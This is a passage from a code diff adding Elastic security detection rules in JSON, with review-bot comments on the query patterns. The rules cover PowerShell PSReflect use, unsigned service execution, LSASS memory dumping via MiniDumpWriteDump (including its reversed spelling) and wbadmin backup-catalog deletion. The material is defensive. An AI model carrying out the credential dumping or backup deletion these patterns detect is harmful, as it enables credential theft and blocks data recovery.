rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text:(\n \"New-InMemoryModule\" or\n \"Add-Win32Type\" or\n psenum or\n DefineDynamicAssembly or\n DefineDynamicModule or\n \"Reflection.TypeAttributes\" or\n \"Reflection.Emit.OpCodes\" or\n \"Reflection.Emit.CustomAttributeBuilder\" or\n \"Runtime.InteropServices.DllImportAttribute\"\n ) and\n not user.id : \"S-1-5-18\" and\n not file.path : ?\\:\\\\\\\\ProgramData\\\\\\\\MaaS360\\\\\\\\Cloud?Extender\\\\\\\\AR\\\\\\\\Scripts\\\\\\\\ASModuleCommon.ps1*\n", + "references": [ + "https://github.com/mattifestation/PSReflect/blob/master/PSReflect.psm1", + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "56f2e9b5-4803-4e44-a0a4-a52dc79d57fe", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + }, + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 110 + }, + "id": "56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_110", + "type": "security-rule" +} \ No newline at end of file 
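Review bot: The exclusion at the end of `query`, `not file.path : ?\:\\\\ProgramData\\\\MaaS360\\\\Cloud?Extender\\\\AR\\\\Scripts\\\\ASModuleCommon.ps1*`, ends in `*`, so it drops every event whose path merely begins with that file name rather than only the one MaaS360 script. The `_210` variant of the same rule in the next hunk moves this to a `filters` wildcard with `case_insensitive: true` and no trailing `*`, which is the narrower form; if this `_110` variant is kept for older stacks, removing the trailing `*` would align the two. Because the JSON carries no comments, a sentence in `note` explaining that `?` here stands in for the drive letter and for the space in `Cloud Extender` would save the next maintainer from reading the pattern as a typo.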
diff --git a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_210.json b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_210.json new file mode 100644 index 00000000000..ccaa207b34c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_210.json 
@@ -0,0 +1,114 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of PSReflect in PowerShell scripts. Attackers leverage PSReflect as a library that enables PowerShell to access win32 API functions.", + "false_positives": [ + "Legitimate PowerShell scripts that make use of PSReflect to access the win32 API" + ], + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\ProgramData\\\\MaaS360\\\\Cloud Extender\\\\AR\\\\Scripts\\\\ASModuleCommon.ps1" + } + } + } + } + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell PSReflect Script", + "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, 
user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text:(\n \"New-InMemoryModule\" or\n \"Add-Win32Type\" or\n psenum or\n DefineDynamicAssembly or\n DefineDynamicModule or\n \"Reflection.TypeAttributes\" or\n \"Reflection.Emit.OpCodes\" or\n \"Reflection.Emit.CustomAttributeBuilder\" or\n \"Runtime.InteropServices.DllImportAttribute\"\n ) and\n not user.id : \"S-1-5-18\"\n", + "references": [ + "https://github.com/mattifestation/PSReflect/blob/master/PSReflect.psm1", + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "56f2e9b5-4803-4e44-a0a4-a52dc79d57fe", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v 
EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + }, + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 210 + }, + "id": "56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_210", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_104.json b/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_104.json new file mode 100644 index 00000000000..da1a631e8a0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_104.json 
@@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule identifies the execution of unsigned executables via service control manager (SCM). Adversaries may abuse SCM to execute malware or escalate privileges.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Execution of an Unsigned Service", + "new_terms_fields": [ + "host.id", + "process.executable", + "user.id" + ], + "query": "host.os.type:windows and event.category:process and event.type:start and \nprocess.parent.executable:\"C:\\\\Windows\\\\System32\\\\services.exe\" and \n(process.code_signature.exists:false or process.code_signature.trusted:false) and\nnot process.code_signature.status : (errorCode_endpoint* or \"errorChaining\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "56fdfcf1-ca7c-4fd9-951d-e215ee26e404", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Rule Type: BBR", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": 
"https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1569", + "name": "System Services", + "reference": "https://attack.mitre.org/techniques/T1569/", + "subtechnique": [ + { + "id": "T1569.002", + "name": "Service Execution", + "reference": "https://attack.mitre.org/techniques/T1569/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 104 + }, + "id": "56fdfcf1-ca7c-4fd9-951d-e215ee26e404_104", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_108.json b/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_108.json new file mode 100644 index 00000000000..0765db2290f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_108.json 
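Review bot: `process.parent.executable:"C:\\\\Windows\\\\System32\\\\services.exe"` in `query` is an exact term match on a keyword field, so the rule only fires when the parent path is logged in exactly this case; whether the endpoint integration normalizes path case is not visible here, and if the mapping has no lowercase normalizer, events logged with a different case would be missed. Either confirm the normalization or use the case-insensitive `filters` wildcard form that the `_210` PSReflect rule in this commit already uses. The `not process.code_signature.status : (errorCode_endpoint* or "errorChaining")` clause also deserves a line in `description`, presumably that these statuses mean the signature could not be evaluated rather than that it was rejected, since this building-block rule ships without a `note` to explain it.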
@@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects PowerShell scripts capable of dumping process memory using WindowsErrorReporting or Dbghelp.dll MiniDumpWriteDump. Attackers can use this tooling to dump LSASS and get access to credentials.", + "false_positives": [ + "PowerShell scripts that use this capability for troubleshooting." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell MiniDump Script", + "note": "## Triage and analysis\n\n### Investigating PowerShell MiniDump Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse Process Memory Dump capabilities to extract credentials from LSASS or to obtain other privileged information stored in the process memory.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check if the imported function was executed and which process it targeted.\n\n### False positive analysis\n\n- Regular users do not have a business justification for using scripting utilities to dump process memory, making false positives unlikely.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and powershell.file.script_block_text:(MiniDumpWriteDump or MiniDumpWithFullMemory or pmuDetirWpmuDiniM) and not user.id : \"S-1-5-18\"\n", + "references": [ + "https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1", + "https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-ProcessMiniDump.ps1", + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "577ec21e-56fe-4065-91d8-45eb8224fe77", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: 
Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 108 + }, + "id": "577ec21e-56fe-4065-91d8-45eb8224fe77_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_110.json b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_110.json new file mode 100644 index 00000000000..dac0cc37dee --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_110.json 
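Review bot: The `query` term `pmuDetirWpmuDiniM` is `MiniDumpWriteDump` spelled backwards, and neither `description` nor `note` says so, so a later maintainer could mistake it for a typo and remove it. Since JSON has no comments, the explanation belongs in the investigation guide, e.g. appended to the second paragraph of `note`: `The rule also matches the reversed spelling of MiniDumpWriteDump so that obfuscated scripts that reverse the API name are still caught.` Separately, the `setup` text here says `must be enabled.` while the PSReflect rules earlier in this commit say `must be configured (Enable).` for the same policy; the wording should be consistent across the package.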
@@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the wbadmin.exe to delete the backup catalog. Ransomware and other malware may do this to prevent system recovery.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Deleting Backup Catalogs with Wbadmin", + "note": "## Triage and analysis\n\n### Investigating Deleting Backup Catalogs with Wbadmin\n\nWindows Server Backup stores the details about your backups (what volumes are backed up and where the backups are located) in a file called a backup catalog, which ransomware victims can use to recover corrupted backup files. Deleting these files is a common step in threat actor playbooks.\n\nThis rule identifies the deletion of the backup catalog using the `wbadmin.exe` utility.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- Administrators can use this command to delete corrupted catalogs, but overall the activity is unlikely to be legitimate.\n\n### Related rules\n\n- Third-party Backup Files Deleted via Unexpected Process - 11ea6bec-ebde-4d71-a8e9-784948f8e3e9\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities.\n- If any backups were affected:\n - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"wbadmin.exe\" or ?process.pe.original_file_name == \"WBADMIN.EXE\") and\n process.args : \"catalog\" and process.args : \"delete\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "581add16-df76-42bb-af8e-c979bfb39a59", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more 
details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + }, + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "581add16-df76-42bb-af8e-c979bfb39a59_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_111.json b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_111.json new file mode 100644 index 00000000000..025d9f1345f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_111.json 
@@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the wbadmin.exe to delete the backup catalog. Ransomware and other malware may do this to prevent system recovery.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Deleting Backup Catalogs with Wbadmin", + "note": "## Triage and analysis\n\n### Investigating Deleting Backup Catalogs with Wbadmin\n\nWindows Server Backup stores the details about your backups (what volumes are backed up and where the backups are located) in a file called a backup catalog, which ransomware victims can use to recover corrupted backup files. Deleting these files is a common step in threat actor playbooks.\n\nThis rule identifies the deletion of the backup catalog using the `wbadmin.exe` utility.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- Administrators can use this command to delete corrupted catalogs, but overall the activity is unlikely to be legitimate.\n\n### Related rules\n\n- Third-party Backup Files Deleted via Unexpected Process - 11ea6bec-ebde-4d71-a8e9-784948f8e3e9\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities.\n- If any backups were affected:\n - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"wbadmin.exe\" or ?process.pe.original_file_name == \"WBADMIN.EXE\") and\n process.args : \"catalog\" and process.args : \"delete\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": 